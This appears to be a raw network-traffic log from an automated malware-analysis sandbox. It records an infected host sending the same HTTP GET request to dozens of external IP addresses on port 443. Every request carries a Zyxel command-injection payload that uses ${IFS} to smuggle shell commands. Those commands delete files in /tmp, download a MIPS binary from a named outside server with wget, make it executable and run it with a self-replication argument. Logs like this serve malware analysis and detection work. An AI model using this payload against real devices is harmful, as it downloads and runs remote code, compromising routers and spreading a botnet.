                                                      Feb 2, 2024 06:36:13.071811914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9318192.168.2.145791293.168.88.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071850061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9319192.168.2.1433462153.158.8.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071899891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9320192.168.2.1436026132.234.246.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071944952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9321192.168.2.1433704161.172.138.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071968079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9322192.168.2.144318891.217.93.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.071986914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9323192.168.2.1457896124.22.207.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072102070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9324192.168.2.145555897.8.35.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072102070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9325192.168.2.1449456137.102.236.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072133064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9326192.168.2.145152092.68.125.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072158098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9327192.168.2.146049092.101.22.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072206974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9328192.168.2.1432976189.83.37.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072249889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9329192.168.2.1438990116.49.117.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072292089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9330192.168.2.145840214.68.85.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072341919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9331192.168.2.1459034190.165.7.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072375059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9332192.168.2.1443160159.56.102.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072401047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9333192.168.2.145435482.133.193.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072438002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9334192.168.2.14537008.56.75.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072465897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9335192.168.2.145853051.45.235.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072520018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9336192.168.2.1450954125.196.127.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072551966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9337192.168.2.144607620.79.39.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072578907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9338192.168.2.1455834187.90.100.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072632074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9339192.168.2.145887291.58.117.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072649002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9340192.168.2.1455572203.141.203.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072694063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9341192.168.2.1442770107.63.207.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072736979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9342192.168.2.1451042147.108.194.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072767019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9343192.168.2.1441886130.37.251.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072805882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9344192.168.2.143980897.20.124.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072839975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9345192.168.2.1436326177.242.95.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072870970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9346192.168.2.143679686.101.57.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072921038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9347192.168.2.144470274.41.248.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.072968006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9348192.168.2.1449240100.148.180.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073009968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9349192.168.2.1452558143.2.132.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073050976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9350192.168.2.1444920159.215.32.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073093891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9351192.168.2.143620682.119.40.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073127985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9352192.168.2.143845217.124.114.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073183060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9353192.168.2.1455726123.232.175.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073200941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9354192.168.2.14570168.0.206.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073244095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9355192.168.2.1459770114.83.113.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073266983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9356192.168.2.144478251.98.132.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073312998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9357192.168.2.145299861.35.242.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073347092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9358192.168.2.143418088.144.7.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073410034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9359192.168.2.1448348210.134.237.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073447943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9360192.168.2.1439760141.150.229.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073508024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9361192.168.2.1442152115.212.223.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073542118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9362192.168.2.1459106159.46.218.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073569059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9363192.168.2.143989269.73.115.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073605061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9364192.168.2.145841285.161.155.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073649883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9365192.168.2.1456652209.49.66.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073697090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9366192.168.2.145728887.108.49.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073729992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9367192.168.2.1447520147.204.115.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073782921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9368192.168.2.145271632.230.224.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073817968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9369192.168.2.1458726194.8.250.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073868036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9370192.168.2.144344234.254.121.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073906898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9371192.168.2.1447292195.46.117.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073937893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9372192.168.2.1451758218.89.134.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.073986053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9373192.168.2.143697872.55.175.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074024916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9374192.168.2.144250847.77.46.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074071884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9375192.168.2.1434538179.3.180.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074115992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9376192.168.2.1457224219.188.24.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074143887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9377192.168.2.1460100158.6.185.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074167013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9378192.168.2.1441662171.68.170.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074217081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9379192.168.2.143588489.84.194.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.074261904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9380192.168.2.145595831.70.217.213443
                                                      TimestampBytes transferredDirectionData
